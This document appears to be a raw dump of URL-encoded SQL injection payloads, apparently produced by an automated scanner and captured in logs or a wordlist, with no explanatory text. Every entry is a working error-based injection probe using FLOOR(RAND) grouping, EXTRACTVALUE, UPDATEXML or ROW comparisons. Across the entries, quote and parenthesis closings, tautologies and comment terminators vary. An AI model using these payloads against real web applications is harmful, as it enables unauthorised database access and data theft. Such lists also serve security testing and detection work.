-6850%27%29%20WHERE%206992%3D6992%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -9450%22%29%20WHERE%201726%3D1726%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -5355%29%20WHERE%206850%3D6850%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -7026%27%20WHERE%202995%3D2995%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -5538%22%20WHERE%207799%3D7799%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -3077%20WHERE%209148%3D9148%20OR%20%28SELECT%202270%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%282270%3D2270%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1234.5%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%27%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%27%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%22%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%285397%3D5397 1234.5%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%289138%3D9138 1234.5%29%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%287933%3D7933 1234.5%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29 1234.5%27%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27zDuW%27%3D%27zDuW 1234.5%27%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%27gYyJ%27%3D%27gYyJ 1234.5%27%29%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%27OOUP%27%3D%27OOUP 1234.5%27%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27sRsn%27%3D%27sRsn 1234.5%27%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27hFOh%27%20LIKE%20%27hFOh 1234.5%27%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%27xjyV%27%20LIKE%20%27xjyV 1234.5%27%29%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%27XUoI%27%20LIKE%20%27XUoI 1234.5%27%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27OGjc%27%20LIKE%20%27OGjc 1234.5%22%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%22qIzT%22%3D%22qIzT 1234.5%22%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%22kUcb%22%3D%22kUcb 1234.5%22%29%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%22FsLJ%22%3D%22FsLJ 1234.5%22%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%22rYaD%22%3D%22rYaD 1234.5%22%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%22OMfe%22%20LIKE%20%22OMfe 1234.5%22%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%22DTZy%22%20LIKE%20%22DTZy 1234.5%22%29%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%22jXPm%22%20LIKE%20%22jXPm 1234.5%22%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%22pxxq%22%20LIKE%20%22pxxq 1234.5%25%27%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%28%27doii%27%3D%27doii 1234.5%00%27%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20AND%20%27slyd%27%3D%27slyd 1234.5%27%29%20WHERE%201141%3D1141%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%22%29%20WHERE%205827%3D5827%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%29%20WHERE%203977%3D3977%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%27%20WHERE%205595%3D5595%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%22%20WHERE%202721%3D2721%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%20WHERE%209205%3D9205%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27hRDN%27%20FROM%20DUAL%20WHERE%206519%3D6519%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27LWTd%27%20WHERE%201704%3D1704%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20owMN%20WHERE%202429%3D2429%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27KTeW%27%20WHERE%202909%3D2909%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%287551%2CCONCAT%280x5c%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%287551%3D7551%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%29%20%23 1234.5%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29 1234.5%27%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29 1234.5%27%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29 1234.5%22%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29 1234.5%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%287785%3D7785 1234.5%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%287145%3D7145 1234.5%29%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%284361%3D4361 1234.5%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29 1234.5%27%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%27HZYp%27%3D%27HZYp 1234.5%27%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%27SGKi%27%3D%27SGKi 1234.5%27%29%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%28%27qmAF%27%3D%27qmAF 1234.5%27%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%27SNPr%27%3D%27SNPr 1234.5%27%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%27EnZn%27%20LIKE%20%27EnZn 1234.5%27%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%27ToQg%27%20LIKE%20%27ToQg 1234.5%27%29%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%28%27gNoo%27%20LIKE%20%27gNoo 1234.5%27%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%27KmcQ%27%20LIKE%20%27KmcQ 1234.5%22%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%22TqcT%22%3D%22TqcT 1234.5%22%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%22bbax%22%3D%22bbax 1234.5%22%29%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%28%22REzJ%22%3D%22REzJ 1234.5%22%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%22MJaT%22%3D%22MJaT 1234.5%22%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%22xtXG%22%20LIKE%20%22xtXG 1234.5%22%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%22hwKV%22%20LIKE%20%22hwKV 1234.5%22%29%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%28%22AesB%22%20LIKE%20%22AesB 1234.5%22%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%22bXZm%22%20LIKE%20%22bXZm 1234.5%25%27%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%28%27cltT%27%3D%27cltT 1234.5%00%27%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20AND%20%27UvRe%27%3D%27UvRe 1234.5%27%29%20WHERE%208224%3D8224%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20--%20 1234.5%22%29%20WHERE%202008%3D2008%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20--%20 1234.5%29%20WHERE%203037%3D3037%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20--%20 1234.5%27%20WHERE%206428%3D6428%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20--%20 1234.5%22%20WHERE%208539%3D8539%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20--%20 1234.5%20WHERE%201046%3D1046%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27LQxk%27%20FROM%20DUAL%20WHERE%207470%3D7470%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27pEbB%27%20WHERE%206668%3D6668%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20kdLX%20WHERE%207397%3D7397%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27APrw%27%20WHERE%205420%3D5420%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20OR%20UPDATEXML%284932%2CCONCAT%280x2e%2C0x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%284932%3D4932%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%29%2C6146%29%20%23 -8395%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29 -8779%27%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29 -3905%27%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29 -5345%22%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29 -6837%29%20OR%20ROW%289886%2C8172%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6d766b3a%2C%28SELECT%20%28CASE%20WHEN%20%289886%3D9886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7077793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201481%20UNION%20SELECT%207481%20UNION%20SELECT%204525%20UNION%20SELECT%202747%29a%20GROUP%20BY%20x%29%20AND%20%284410%3D4410 